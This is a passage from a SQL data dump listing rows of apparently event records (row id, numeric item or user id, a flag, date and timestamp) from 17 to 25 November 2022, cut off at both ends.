15:59:54'),(64412,4966,1,'2022-11-17','2022-11-17 16:15:07'),(64413,4420,1,'2022-11-17','2022-11-17 16:53:20'),(64414,5131,1,'2022-11-17','2022-11-17 17:21:51'),(64415,1772,1,'2022-11-17','2022-11-17 17:33:50'),(64416,1772,1,'2022-11-17','2022-11-17 17:34:05'),(64417,1772,1,'2022-11-17','2022-11-17 17:34:15'),(64418,76,1,'2022-11-17','2022-11-17 17:46:00'),(64419,1582,1,'2022-11-17','2022-11-17 17:53:30'),(64420,2154,1,'2022-11-17','2022-11-17 18:05:11'),(64421,1602,1,'2022-11-17','2022-11-17 18:08:17'),(64422,1602,1,'2022-11-17','2022-11-17 18:08:34'),(64423,1772,1,'2022-11-17','2022-11-17 18:11:55'),(64424,1602,1,'2022-11-17','2022-11-17 18:35:15'),(64425,5071,1,'2022-11-17','2022-11-17 18:46:42'),(64426,4551,1,'2022-11-17','2022-11-17 18:50:00'),(64427,74,1,'2022-11-17','2022-11-17 19:26:43'),(64428,570,1,'2022-11-17','2022-11-17 19:32:41'),(64429,4514,1,'2022-11-17','2022-11-17 19:48:35'),(64430,1582,1,'2022-11-17','2022-11-17 20:05:22'),(64431,4712,1,'2022-11-17','2022-11-17 20:32:15'),(64432,1544,1,'2022-11-17','2022-11-17 21:43:51'),(64433,1602,1,'2022-11-17','2022-11-17 22:55:22'),(64434,3479,1,'2022-11-17','2022-11-17 23:28:58'),(64435,2904,1,'2022-11-18','2022-11-18 01:43:08'),(64436,4966,1,'2022-11-18','2022-11-18 02:07:39'),(64437,3764,1,'2022-11-18','2022-11-18 02:08:06'),(64438,3764,1,'2022-11-18','2022-11-18 02:10:34'),(64439,3764,1,'2022-11-18','2022-11-18 02:11:28'),(64440,1586,1,'2022-11-18','2022-11-18 02:28:23'),(64441,1872,1,'2022-11-18','2022-11-18 03:04:19'),(64442,1602,1,'2022-11-18','2022-11-18 03:33:33'),(64443,1877,1,'2022-11-18','2022-11-18 03:49:09'),(64444,1612,1,'2022-11-18','2022-11-18 03:51:07'),(64445,4681,1,'2022-11-18','2022-11-18 04:36:01'),(64446,2410,1,'2022-11-18','2022-11-18 04:37:34'),(64447,1590,1,'2022-11-18','2022-11-18 04:38:43'),(64448,4454,1,'2022-11-18','2022-11-18 04:39:21'),(64449,2801,1,'2022-11-18','2022-11-18 05:42:23'),(64450,2617,1,'2022-11-18','2022-11-18 08:01:59'),(64451,2658,1,'2022-11-18','2022-11-18 08:55:31'),(64452,4697,1,'2022-11-18','2022-11-18 09:01:10'),(64453,2658,1,'2022-11-18','2022-11-18 09:11:31'),(64454,4691,1,'2022-11-18','2022-11-18 09:22:00'),(64455,3691,1,'2022-11-18','2022-11-18 09:24:22'),(64456,1544,1,'2022-11-18','2022-11-18 09:50:24'),(64457,1594,1,'2022-11-18','2022-11-18 09:54:45'),(64458,1586,1,'2022-11-18','2022-11-18 10:42:16'),(64459,2410,1,'2022-11-18','2022-11-18 11:04:27'),(64460,4677,1,'2022-11-18','2022-11-18 11:37:50'),(64461,1602,1,'2022-11-18','2022-11-18 11:49:03'),(64462,474,1,'2022-11-18','2022-11-18 11:54:51'),(64463,3498,1,'2022-11-18','2022-11-18 12:22:27'),(64464,91,1,'2022-11-18','2022-11-18 12:34:08'),(64465,4612,1,'2022-11-18','2022-11-18 12:34:50'),(64466,2410,1,'2022-11-18','2022-11-18 12:39:09'),(64467,5163,1,'2022-11-18','2022-11-18 12:40:08'),(64468,1594,1,'2022-11-18','2022-11-18 13:13:52'),(64469,1877,1,'2022-11-18','2022-11-18 13:17:58'),(64470,1711,1,'2022-11-18','2022-11-18 14:13:27'),(64471,1598,1,'2022-11-18','2022-11-18 14:57:16'),(64472,4911,1,'2022-11-18','2022-11-18 16:04:34'),(64473,4960,1,'2022-11-18','2022-11-18 16:13:19'),(64474,4960,1,'2022-11-18','2022-11-18 16:14:22'),(64475,481,1,'2022-11-18','2022-11-18 16:48:11'),(64476,481,1,'2022-11-18','2022-11-18 17:22:05'),(64477,5101,1,'2022-11-18','2022-11-18 17:59:33'),(64478,1586,1,'2022-11-18','2022-11-18 18:53:06'),(64479,2297,1,'2022-11-18','2022-11-18 19:55:25'),(64480,3781,1,'2022-11-18','2022-11-18 20:51:54'),(64481,3102,1,'2022-11-18','2022-11-18 21:22:01'),(64482,1544,1,'2022-11-18','2022-11-18 22:02:16'),(64483,1602,1,'2022-11-18','2022-11-18 22:38:07'),(64484,5163,1,'2022-11-18','2022-11-18 22:47:24'),(64485,1711,1,'2022-11-18','2022-11-18 22:49:37'),(64486,1711,1,'2022-11-18','2022-11-18 22:50:52'),(64487,2658,1,'2022-11-18','2022-11-18 22:50:55'),(64488,1711,1,'2022-11-18','2022-11-18 22:51:11'),(64489,2658,1,'2022-11-18','2022-11-18 22:52:05'),(64490,1600,1,'2022-11-18','2022-11-18 23:04:49'),(64491,2904,1,'2022-11-18','2022-11-18 23:08:03'),(64492,3045,1,'2022-11-18','2022-11-18 23:24:34'),(64493,4706,1,'2022-11-18','2022-11-18 23:31:23'),(64494,4332,1,'2022-11-18','2022-11-18 23:38:07'),(64495,2904,1,'2022-11-18','2022-11-18 23:48:27'),(64496,3045,1,'2022-11-19','2022-11-19 00:08:04'),(64497,4694,1,'2022-11-19','2022-11-19 00:15:10'),(64498,2804,1,'2022-11-19','2022-11-19 00:36:33'),(64499,4700,1,'2022-11-19','2022-11-19 01:00:10'),(64500,1594,1,'2022-11-19','2022-11-19 02:38:05'),(64501,1586,1,'2022-11-19','2022-11-19 03:05:04'),(64502,4520,1,'2022-11-19','2022-11-19 03:54:46'),(64503,4893,1,'2022-11-19','2022-11-19 04:20:51'),(64504,4529,1,'2022-11-19','2022-11-19 04:59:12'),(64505,4416,1,'2022-11-19','2022-11-19 06:41:11'),(64506,4412,1,'2022-11-19','2022-11-19 06:56:03'),(64507,1602,1,'2022-11-19','2022-11-19 07:13:54'),(64508,3781,1,'2022-11-19','2022-11-19 07:19:37'),(64509,570,1,'2022-11-19','2022-11-19 09:17:34'),(64510,4238,1,'2022-11-19','2022-11-19 09:32:32'),(64511,4677,1,'2022-11-19','2022-11-19 09:57:26'),(64512,4709,1,'2022-11-19','2022-11-19 10:00:25'),(64513,4712,1,'2022-11-19','2022-11-19 10:03:23'),(64514,4566,1,'2022-11-19','2022-11-19 10:06:18'),(64515,4703,1,'2022-11-19','2022-11-19 10:09:37'),(64516,74,1,'2022-11-19','2022-11-19 10:13:08'),(64517,4551,1,'2022-11-19','2022-11-19 10:17:08'),(64518,4514,1,'2022-11-19','2022-11-19 10:22:42'),(64519,1608,1,'2022-11-19','2022-11-19 10:23:14'),(64520,68,1,'2022-11-19','2022-11-19 10:23:45'),(64521,1608,1,'2022-11-19','2022-11-19 10:23:50'),(64522,1608,1,'2022-11-19','2022-11-19 10:24:00'),(64523,4529,1,'2022-11-19','2022-11-19 10:30:00'),(64524,2904,1,'2022-11-19','2022-11-19 10:41:50'),(64525,4517,1,'2022-11-19','2022-11-19 10:45:36'),(64526,4524,1,'2022-11-19','2022-11-19 10:51:23'),(64527,4454,1,'2022-11-19','2022-11-19 10:57:24'),(64528,4520,1,'2022-11-19','2022-11-19 11:03:54'),(64529,5101,1,'2022-11-19','2022-11-19 11:30:15'),(64530,89,1,'2022-11-19','2022-11-19 12:09:15'),(64531,1600,1,'2022-11-19','2022-11-19 12:09:35'),(64532,87,1,'2022-11-19','2022-11-19 12:10:02'),(64533,471,1,'2022-11-19','2022-11-19 12:10:23'),(64534,87,1,'2022-11-19','2022-11-19 12:10:53'),(64535,91,1,'2022-11-19','2022-11-19 12:11:08'),(64536,91,1,'2022-11-19','2022-11-19 12:15:25'),(64537,4520,1,'2022-11-19','2022-11-19 12:29:52'),(64538,4977,1,'2022-11-19','2022-11-19 14:00:28'),(64539,2161,1,'2022-11-19','2022-11-19 14:26:51'),(64540,4668,1,'2022-11-19','2022-11-19 14:30:40'),(64541,5163,1,'2022-11-19','2022-11-19 16:13:08'),(64542,1602,1,'2022-11-19','2022-11-19 16:14:09'),(64543,1594,1,'2022-11-19','2022-11-19 16:42:52'),(64544,570,1,'2022-11-19','2022-11-19 16:51:51'),(64545,4387,1,'2022-11-19','2022-11-19 17:33:16'),(64546,4832,1,'2022-11-19','2022-11-19 17:35:06'),(64547,1544,1,'2022-11-19','2022-11-19 17:58:38'),(64548,1610,1,'2022-11-19','2022-11-19 18:01:44'),(64549,76,1,'2022-11-19','2022-11-19 18:23:41'),(64550,335,1,'2022-11-19','2022-11-19 18:24:34'),(64551,4837,1,'2022-11-19','2022-11-19 18:47:03'),(64552,4938,1,'2022-11-19','2022-11-19 20:58:17'),(64553,4938,1,'2022-11-19','2022-11-19 21:03:22'),(64554,4938,1,'2022-11-19','2022-11-19 21:04:21'),(64555,4930,1,'2022-11-19','2022-11-19 21:04:53'),(64556,4930,1,'2022-11-19','2022-11-19 21:05:41'),(64557,4938,1,'2022-11-19','2022-11-19 21:05:48'),(64558,1602,1,'2022-11-20','2022-11-20 00:13:16'),(64559,1610,1,'2022-11-20','2022-11-20 03:46:35'),(64560,91,1,'2022-11-20','2022-11-20 05:03:35'),(64561,4440,1,'2022-11-20','2022-11-20 05:36:26'),(64562,1724,1,'2022-11-20','2022-11-20 05:46:05'),(64563,1724,1,'2022-11-20','2022-11-20 05:47:27'),(64564,1724,1,'2022-11-20','2022-11-20 05:47:52'),(64565,2159,1,'2022-11-20','2022-11-20 06:03:23'),(64566,108,1,'2022-11-20','2022-11-20 06:03:25'),(64567,1584,1,'2022-11-20','2022-11-20 07:33:33'),(64568,1602,1,'2022-11-20','2022-11-20 07:35:30'),(64569,1602,1,'2022-11-20','2022-11-20 07:35:31'),(64570,4412,1,'2022-11-20','2022-11-20 08:05:06'),(64571,3056,1,'2022-11-20','2022-11-20 09:03:27'),(64572,1594,1,'2022-11-20','2022-11-20 09:04:21'),(64573,87,1,'2022-11-20','2022-11-20 10:06:58'),(64574,1608,1,'2022-11-20','2022-11-20 10:31:48'),(64575,4977,1,'2022-11-20','2022-11-20 10:42:06'),(64576,4977,1,'2022-11-20','2022-11-20 11:22:57'),(64577,4765,1,'2022-11-20','2022-11-20 12:28:37'),(64578,1600,1,'2022-11-20','2022-11-20 12:30:52'),(64579,4930,1,'2022-11-20','2022-11-20 13:38:45'),(64580,91,1,'2022-11-20','2022-11-20 13:39:35'),(64581,1612,1,'2022-11-20','2022-11-20 14:34:12'),(64582,76,1,'2022-11-20','2022-11-20 14:35:48'),(64583,2503,1,'2022-11-20','2022-11-20 14:36:22'),(64584,2503,1,'2022-11-20','2022-11-20 15:06:00'),(64585,4576,1,'2022-11-20','2022-11-20 15:08:34'),(64586,108,1,'2022-11-20','2022-11-20 16:15:48'),(64587,2159,1,'2022-11-20','2022-11-20 16:16:13'),(64588,4966,1,'2022-11-20','2022-11-20 16:27:59'),(64589,2658,1,'2022-11-20','2022-11-20 16:35:38'),(64590,1722,1,'2022-11-20','2022-11-20 16:41:36'),(64591,1722,1,'2022-11-20','2022-11-20 16:41:44'),(64592,1722,1,'2022-11-20','2022-11-20 16:42:39'),(64593,1722,1,'2022-11-20','2022-11-20 16:42:50'),(64594,4514,1,'2022-11-20','2022-11-20 16:47:48'),(64595,80,1,'2022-11-20','2022-11-20 17:36:28'),(64596,4448,1,'2022-11-20','2022-11-20 17:36:36'),(64597,3181,1,'2022-11-20','2022-11-20 17:41:52'),(64598,3124,1,'2022-11-20','2022-11-20 17:55:46'),(64599,1741,1,'2022-11-20','2022-11-20 17:56:29'),(64600,5140,1,'2022-11-20','2022-11-20 17:58:25'),(64601,5062,1,'2022-11-20','2022-11-20 18:23:35'),(64602,4966,1,'2022-11-20','2022-11-20 18:45:20'),(64603,84,1,'2022-11-20','2022-11-20 18:50:02'),(64604,570,1,'2022-11-20','2022-11-20 18:50:22'),(64605,4391,1,'2022-11-20','2022-11-20 18:50:39'),(64606,4396,1,'2022-11-20','2022-11-20 18:53:58'),(64607,2558,1,'2022-11-20','2022-11-20 19:09:07'),(64608,4660,1,'2022-11-20','2022-11-20 19:20:58'),(64609,4960,1,'2022-11-20','2022-11-20 19:25:00'),(64610,335,1,'2022-11-20','2022-11-20 19:26:55'),(64611,4960,1,'2022-11-20','2022-11-20 19:27:20'),(64612,4960,1,'2022-11-20','2022-11-20 19:37:46'),(64613,1722,1,'2022-11-20','2022-11-20 19:55:58'),(64614,1722,1,'2022-11-20','2022-11-20 19:56:28'),(64615,1722,1,'2022-11-20','2022-11-20 20:31:34'),(64616,5058,1,'2022-11-20','2022-11-20 22:48:07'),(64617,91,1,'2022-11-20','2022-11-20 22:54:47'),(64618,1718,1,'2022-11-20','2022-11-20 22:56:12'),(64619,1718,1,'2022-11-20','2022-11-20 22:56:33'),(64620,1718,1,'2022-11-20','2022-11-20 22:57:01'),(64621,91,1,'2022-11-20','2022-11-20 22:57:26'),(64622,4608,1,'2022-11-20','2022-11-20 22:58:24'),(64623,91,1,'2022-11-20','2022-11-20 23:00:26'),(64624,5071,1,'2022-11-20','2022-11-20 23:01:24'),(64625,5071,1,'2022-11-20','2022-11-20 23:01:25'),(64626,91,1,'2022-11-20','2022-11-20 23:01:40'),(64627,4874,1,'2022-11-20','2022-11-20 23:02:43'),(64628,91,1,'2022-11-20','2022-11-20 23:05:49'),(64629,469,1,'2022-11-20','2022-11-20 23:32:42'),(64630,4457,1,'2022-11-21','2022-11-21 00:08:06'),(64631,1610,1,'2022-11-21','2022-11-21 00:41:23'),(64632,1610,1,'2022-11-21','2022-11-21 00:41:25'),(64633,3307,1,'2022-11-21','2022-11-21 04:14:58'),(64634,1614,1,'2022-11-21','2022-11-21 04:27:23'),(64635,3271,1,'2022-11-21','2022-11-21 05:05:34'),(64636,2965,1,'2022-11-21','2022-11-21 09:18:52'),(64637,76,1,'2022-11-21','2022-11-21 09:31:57'),(64638,1582,1,'2022-11-21','2022-11-21 09:58:28'),(64639,5146,1,'2022-11-21','2022-11-21 10:09:20'),(64640,80,1,'2022-11-21','2022-11-21 10:12:28'),(64641,4457,1,'2022-11-21','2022-11-21 10:32:23'),(64642,4930,1,'2022-11-21','2022-11-21 10:33:28'),(64643,87,1,'2022-11-21','2022-11-21 10:35:50'),(64644,484,1,'2022-11-21','2022-11-21 10:37:10'),(64645,87,1,'2022-11-21','2022-11-21 10:37:23'),(64646,4930,1,'2022-11-21','2022-11-21 10:37:27'),(64647,4457,1,'2022-11-21','2022-11-21 10:37:32'),(64648,5163,1,'2022-11-21','2022-11-21 10:43:53'),(64649,68,1,'2022-11-21','2022-11-21 11:01:56'),(64650,1612,1,'2022-11-21','2022-11-21 11:14:02'),(64651,76,1,'2022-11-21','2022-11-21 11:14:13'),(64652,1612,1,'2022-11-21','2022-11-21 11:14:56'),(64653,1584,1,'2022-11-21','2022-11-21 11:18:23'),(64654,91,1,'2022-11-21','2022-11-21 11:42:39'),(64655,76,1,'2022-11-21','2022-11-21 11:43:12'),(64656,91,1,'2022-11-21','2022-11-21 11:43:22'),(64657,5024,1,'2022-11-21','2022-11-21 12:30:33'),(64658,5024,1,'2022-11-21','2022-11-21 12:30:35'),(64659,335,1,'2022-11-21','2022-11-21 13:26:04'),(64660,1612,1,'2022-11-21','2022-11-21 13:38:11'),(64661,1600,1,'2022-11-21','2022-11-21 13:41:25'),(64662,4608,1,'2022-11-21','2022-11-21 14:08:57'),(64663,3777,1,'2022-11-21','2022-11-21 14:28:17'),(64664,3777,1,'2022-11-21','2022-11-21 14:47:37'),(64665,3777,1,'2022-11-21','2022-11-21 14:47:55'),(64666,1726,1,'2022-11-21','2022-11-21 15:32:31'),(64667,3781,1,'2022-11-21','2022-11-21 16:02:28'),(64668,1596,1,'2022-11-21','2022-11-21 16:06:29'),(64669,1722,1,'2022-11-21','2022-11-21 16:34:45'),(64670,2704,1,'2022-11-21','2022-11-21 16:54:39'),(64671,4485,1,'2022-11-21','2022-11-21 17:30:34'),(64672,335,1,'2022-11-21','2022-11-21 18:25:27'),(64673,4966,1,'2022-11-21','2022-11-21 18:50:40'),(64674,4485,1,'2022-11-21','2022-11-21 19:00:31'),(64675,3229,1,'2022-11-21','2022-11-21 19:28:47'),(64676,3282,1,'2022-11-21','2022-11-21 19:56:43'),(64677,4966,1,'2022-11-21','2022-11-21 22:45:56'),(64678,3102,1,'2022-11-21','2022-11-21 22:47:49'),(64679,474,1,'2022-11-21','2022-11-21 22:55:18'),(64680,3261,1,'2022-11-21','2022-11-21 22:56:39'),(64681,91,1,'2022-11-21','2022-11-21 23:04:46'),(64682,5137,1,'2022-11-22','2022-11-22 02:49:36'),(64683,2801,1,'2022-11-22','2022-11-22 03:13:11'),(64684,2309,1,'2022-11-22','2022-11-22 04:03:48'),(64685,467,1,'2022-11-22','2022-11-22 04:43:28'),(64686,1544,1,'2022-11-22','2022-11-22 04:49:44'),(64687,1602,1,'2022-11-22','2022-11-22 05:03:04'),(64688,3023,1,'2022-11-22','2022-11-22 05:46:39'),(64689,4404,1,'2022-11-22','2022-11-22 06:19:26'),(64690,1544,1,'2022-11-22','2022-11-22 06:25:56'),(64691,5122,1,'2022-11-22','2022-11-22 06:35:29'),(64692,4944,1,'2022-11-22','2022-11-22 06:50:00'),(64693,5054,1,'2022-11-22','2022-11-22 07:21:08'),(64694,1544,1,'2022-11-22','2022-11-22 08:11:17'),(64695,1782,1,'2022-11-22','2022-11-22 08:34:26'),(64696,5153,1,'2022-11-22','2022-11-22 08:43:08'),(64697,1774,1,'2022-11-22','2022-11-22 08:46:13'),(64698,3664,1,'2022-11-22','2022-11-22 08:55:03'),(64699,5153,1,'2022-11-22','2022-11-22 09:00:49'),(64700,4551,1,'2022-11-22','2022-11-22 09:18:08'),(64701,4341,1,'2022-11-22','2022-11-22 09:24:00'),(64702,4551,1,'2022-11-22','2022-11-22 09:26:55'),(64703,4551,1,'2022-11-22','2022-11-22 09:47:44'),(64704,80,1,'2022-11-22','2022-11-22 09:59:45'),(64705,4551,1,'2022-11-22','2022-11-22 10:03:50'),(64706,4551,1,'2022-11-22','2022-11-22 10:56:39'),(64707,4551,1,'2022-11-22','2022-11-22 11:41:42'),(64708,3674,1,'2022-11-22','2022-11-22 12:37:33'),(64709,1586,1,'2022-11-22','2022-11-22 12:39:18'),(64710,80,1,'2022-11-22','2022-11-22 12:52:47'),(64711,4960,1,'2022-11-22','2022-11-22 12:56:54'),(64712,570,1,'2022-11-22','2022-11-22 13:19:08'),(64713,5125,1,'2022-11-22','2022-11-22 13:41:38'),(64714,5163,1,'2022-11-22','2022-11-22 13:54:29'),(64715,5122,1,'2022-11-22','2022-11-22 14:26:53'),(64716,72,1,'2022-11-22','2022-11-22 14:40:33'),(64717,5128,1,'2022-11-22','2022-11-22 14:50:43'),(64718,1602,1,'2022-11-22','2022-11-22 14:59:26'),(64719,5134,1,'2022-11-22','2022-11-22 15:12:09'),(64720,4485,1,'2022-11-22','2022-11-22 15:25:45'),(64721,4485,1,'2022-11-22','2022-11-22 15:29:01'),(64722,5137,1,'2022-11-22','2022-11-22 15:34:07'),(64723,4944,1,'2022-11-22','2022-11-22 15:35:22'),(64724,470,1,'2022-11-22','2022-11-22 15:38:38'),(64725,5131,1,'2022-11-22','2022-11-22 15:50:31'),(64726,5020,1,'2022-11-22','2022-11-22 16:03:56'),(64727,5163,1,'2022-11-22','2022-11-22 16:09:40'),(64728,4485,1,'2022-11-22','2022-11-22 16:10:34'),(64729,68,1,'2022-11-22','2022-11-22 16:11:03'),(64730,76,1,'2022-11-22','2022-11-22 16:11:29'),(64731,76,1,'2022-11-22','2022-11-22 16:12:42'),(64732,68,1,'2022-11-22','2022-11-22 16:12:45'),(64733,5163,1,'2022-11-22','2022-11-22 16:12:48'),(64734,4944,1,'2022-11-22','2022-11-22 16:18:59'),(64735,68,1,'2022-11-22','2022-11-22 16:22:15'),(64736,4335,1,'2022-11-22','2022-11-22 16:30:45'),(64737,470,1,'2022-11-22','2022-11-22 18:25:07'),(64738,4944,1,'2022-11-22','2022-11-22 18:30:19'),(64739,3534,1,'2022-11-22','2022-11-22 18:39:41'),(64740,4420,1,'2022-11-22','2022-11-22 20:28:03'),(64741,1586,1,'2022-11-22','2022-11-22 20:41:27'),(64742,1586,1,'2022-11-22','2022-11-22 20:41:28'),(64743,1586,1,'2022-11-22','2022-11-22 20:41:40'),(64744,68,1,'2022-11-22','2022-11-22 20:42:49'),(64745,68,1,'2022-11-22','2022-11-22 20:42:52'),(64746,1586,1,'2022-11-22','2022-11-22 20:43:13'),(64747,4377,1,'2022-11-22','2022-11-22 21:46:25'),(64748,3764,1,'2022-11-22','2022-11-22 22:45:25'),(64749,1602,1,'2022-11-23','2022-11-23 03:20:07'),(64750,3313,1,'2022-11-23','2022-11-23 03:37:17'),(64751,1720,1,'2022-11-23','2022-11-23 04:51:09'),(64752,3706,1,'2022-11-23','2022-11-23 06:23:03'),(64753,3691,1,'2022-11-23','2022-11-23 06:28:16'),(64754,3316,1,'2022-11-23','2022-11-23 07:43:58'),(64755,1594,1,'2022-11-23','2022-11-23 09:45:03'),(64756,1872,1,'2022-11-23','2022-11-23 10:24:19'),(64757,1594,1,'2022-11-23','2022-11-23 10:26:09'),(64758,5080,1,'2022-11-23','2022-11-23 11:10:05'),(64759,1598,1,'2022-11-23','2022-11-23 11:56:46'),(64760,1602,1,'2022-11-23','2022-11-23 12:04:16'),(64761,4436,1,'2022-11-23','2022-11-23 12:23:09'),(64762,3691,1,'2022-11-23','2022-11-23 12:25:43'),(64763,91,1,'2022-11-23','2022-11-23 12:26:07'),(64764,3083,1,'2022-11-23','2022-11-23 13:00:37'),(64765,4944,1,'2022-11-23','2022-11-23 13:44:14'),(64766,3691,1,'2022-11-23','2022-11-23 14:01:54'),(64767,91,1,'2022-11-23','2022-11-23 14:16:52'),(64768,1602,1,'2022-11-23','2022-11-23 14:28:44'),(64769,1602,1,'2022-11-23','2022-11-23 14:29:14'),(64770,87,1,'2022-11-23','2022-11-23 14:29:34'),(64771,1602,1,'2022-11-23','2022-11-23 14:29:53'),(64772,3083,1,'2022-11-23','2022-11-23 15:07:28'),(64773,4944,1,'2022-11-23','2022-11-23 15:14:01'),(64774,1743,1,'2022-11-23','2022-11-23 15:55:29'),(64775,1586,1,'2022-11-23','2022-11-23 16:36:57'),(64776,2457,1,'2022-11-23','2022-11-23 16:59:07'),(64777,3316,1,'2022-11-23','2022-11-23 18:04:54'),(64778,1544,1,'2022-11-23','2022-11-23 18:16:21'),(64779,4938,1,'2022-11-23','2022-11-23 20:13:01'),(64780,1586,1,'2022-11-23','2022-11-23 21:14:29'),(64781,1586,1,'2022-11-23','2022-11-23 21:49:41'),(64782,570,1,'2022-11-23','2022-11-23 23:56:35'),(64783,91,1,'2022-11-24','2022-11-24 01:39:07'),(64784,4542,1,'2022-11-24','2022-11-24 01:53:13'),(64785,1588,1,'2022-11-24','2022-11-24 02:52:34'),(64786,4944,1,'2022-11-24','2022-11-24 03:47:06'),(64787,3664,1,'2022-11-24','2022-11-24 03:47:09'),(64788,467,1,'2022-11-24','2022-11-24 04:49:08'),(64789,3005,1,'2022-11-24','2022-11-24 04:56:46'),(64790,4694,1,'2022-11-24','2022-11-24 05:02:04'),(64791,4432,1,'2022-11-24','2022-11-24 05:17:05'),(64792,3664,1,'2022-11-24','2022-11-24 05:34:03'),(64793,570,1,'2022-11-24','2022-11-24 06:05:20'),(64794,5125,1,'2022-11-24','2022-11-24 06:46:17'),(64795,4404,1,'2022-11-24','2022-11-24 07:28:17'),(64796,1720,1,'2022-11-24','2022-11-24 07:39:17'),(64797,1608,1,'2022-11-24','2022-11-24 07:44:13'),(64798,4444,1,'2022-11-24','2022-11-24 08:39:15'),(64799,5042,1,'2022-11-24','2022-11-24 08:49:27'),(64800,1590,1,'2022-11-24','2022-11-24 08:58:37'),(64801,3261,1,'2022-11-24','2022-11-24 09:56:34'),(64802,4323,1,'2022-11-24','2022-11-24 12:09:14'),(64803,4323,1,'2022-11-24','2022-11-24 12:10:13'),(64804,2410,1,'2022-11-24','2022-11-24 12:34:25'),(64805,4944,1,'2022-11-24','2022-11-24 12:41:53'),(64806,570,1,'2022-11-24','2022-11-24 13:04:16'),(64807,570,1,'2022-11-24','2022-11-24 13:04:45'),(64808,4457,1,'2022-11-24','2022-11-24 13:05:47'),(64809,1612,1,'2022-11-24','2022-11-24 14:00:42'),(64810,76,1,'2022-11-24','2022-11-24 14:05:44'),(64811,91,1,'2022-11-24','2022-11-24 14:06:15'),(64812,1594,1,'2022-11-24','2022-11-24 15:00:12'),(64813,2309,1,'2022-11-24','2022-11-24 15:01:06'),(64814,3058,1,'2022-11-24','2022-11-24 16:25:14'),(64815,4897,1,'2022-11-24','2022-11-24 16:47:45'),(64816,4485,1,'2022-11-24','2022-11-24 17:10:13'),(64817,1604,1,'2022-11-24','2022-11-24 17:20:40'),(64818,76,1,'2022-11-24','2022-11-24 17:21:42'),(64819,84,1,'2022-11-24','2022-11-24 17:36:20'),(64820,1877,1,'2022-11-24','2022-11-24 17:41:29'),(64821,5163,1,'2022-11-24','2022-11-24 17:49:13'),(64822,4485,1,'2022-11-24','2022-11-24 18:40:17'),(64823,1600,1,'2022-11-24','2022-11-24 18:47:20'),(64824,4642,1,'2022-11-24','2022-11-24 18:53:13'),(64825,1606,1,'2022-11-24','2022-11-24 19:06:24'),(64826,3691,1,'2022-11-24','2022-11-24 19:19:29'),(64827,80,1,'2022-11-24','2022-11-24 19:32:28'),(64828,3107,1,'2022-11-24','2022-11-24 19:41:39'),(64829,91,1,'2022-11-24','2022-11-24 19:41:44'),(64830,4642,1,'2022-11-24','2022-11-24 21:02:06'),(64831,4911,1,'2022-11-24','2022-11-24 21:29:42'),(64832,4911,1,'2022-11-24','2022-11-24 21:42:39'),(64833,80,1,'2022-11-24','2022-11-24 21:43:49'),(64834,4911,1,'2022-11-24','2022-11-24 21:44:14'),(64835,4668,1,'2022-11-24','2022-11-24 21:51:14'),(64836,2297,1,'2022-11-24','2022-11-24 22:41:31'),(64837,4741,1,'2022-11-24','2022-11-24 22:41:34'),(64838,4642,1,'2022-11-24','2022-11-24 22:42:02'),(64839,335,1,'2022-11-24','2022-11-24 22:43:40'),(64840,1606,1,'2022-11-24','2022-11-24 23:29:13'),(64841,5140,1,'2022-11-25','2022-11-25 00:17:22'),(64842,3083,1,'2022-11-25','2022-11-25 00:51:32'),(64843,80,1,'2022-11-25','2022-11-25 01:06:20'),(64844,1544,1,'2022-11-25','2022-11-25 01:28:02'),(64845,488,1,'2022-11-25','2022-11-25 01:43:15'),(64846,3245,1,'2022-11-25','2022-11-25 02:11:21'),(64847,3245,1,'2022-11-25','2022-11-25 02:11:54'),(64848,3245,1,'2022-11-25','2022-11-25 02:12:15'),(64849,1600,1,'2022-11-25','2022-11-25 04:26:38'),(64850,1600,1,'2022-11-25','2022-11-25 04:27:56'),(64851,3691,1,'2022-11-25','2022-11-25 04:43:15'),(64852,1774,1,'2022-11-25','2022-11-25 05:05:45'),(64853,472,1,'2022-11-25','2022-11-25 05:29:40'),(64854,469,1,'2022-11-25','2022-11-25 08:25:39'),(64855,469,1,'2022-11-25','2022-11-25 08:25:42'),(64856,1872,1,'2022-11-25','2022-11-25 08:28:24'),(64857,4980,1,'2022-11-25','2022-11-25 08:53:44'),(64858,2809,1,'2022-11-25','2022-11-25 09:13:23'),(64859,1544,1,'2022-11-25','2022-11-25 09:31:55'),(64860,1544,1,'2022-11-25','2022-11-25 09:32:33'),(64861,80,1,'2022-11-25','2022-11-25 10:01:39'),(64862,4960,1,'2022-11-25','2022-11-25 10:52:33'),(64863,3664,1,'2022-11-25','2022-11-25 10:52:58'),(64864,1588,1,'2022-11-25','2022-11-25 11:22:21'),(64865,4238,1,'2022-11-25','2022-11-25 12:10:47'),(64866,3245,1,'2022-11-25','2022-11-25 12:59:17'),(64867,1728,1,'2022-11-25','2022-11-25 13:17:55'),(64868,1728,1,'2022-11-25','2022-11-25 13:18:07'),(64869,1728,1,'2022-11-25','2022-11-25 13:18:18'),(64870,3691,1,'2022-11-25','2022-11-25 14:13:20'),(64871,1544,1,'2022-11-25','2022-11-25 14:39:34'),(64872,4911,1,'2022-11-25','2022-11-25 15:13:29'),(64873,80,1,'2022-11-25','2022-11-25 15:33:19'),(64874,1596,1,'2022-11-25','2022-11-25 15:43:36'),(64875,1544,1,'2022-11-25','2022-11-25 16:09:29'),(64876,4428,1,'2022-11-25','2022-11-25 16:42:26'),(64877,1596,1,'2022-11-25','2022-11-25 17:21:06'),(64878,4416,1,'2022-11-25','2022-11-25 17:27:36'),(64879,570,1,'2022-11-25','2022-11-25 17:35:53'),(64880,467,1,'2022-11-25','2022-11-25 18:05:14'),(64881,1872,1,'2022-11-25','2022-11-25 18:15:17'),(64882,3710,1,'2022-11-25','2022-11-25 19:07:39'),(64883,3006,1,'2022-11-25','2022-11-25 19:23:16'),(64884,3664,1,'2022-11-25','2022-11-25 19:37:33'),(64885,4576,1,'2022-11-25','2022-11-25 19:43:53'),(64886,3030,1,'2022-11-25','2022-11-25 20:04:41'),(64887,3764,1,'2022-11-25','2022-11-25 20:24:48'),(64888,4966,1,'2022-11-25','2022-11-25 21:04:17'),(64889,335,1,'2022-11-25','2022-11-25 21:07:38'),(64890,3083,1,'2022-11-25','2022-11-25 21:43:04'),(64891,570,1,'2022-11-25','2022-11-25 21:54:59'),(64892,570,1,'2022-11-25','2022-11-25 21:55:37'),(64893,68,1,'2022-11-25','2022-11-25 21:55:41'),(64894,570,1,'2022-11-25','2022-11-25 21:56:00'),(64895,570,1,'2022-11-25','2022-11-25 21:56:16'),(64896,68,1,'2022-11-25','2022-11-25 21:56:44'),(64897,84,1,'2022-11-25','2022-11-25 21:59:02'),(64898,68,1,'2022-11-25','2022-11-25 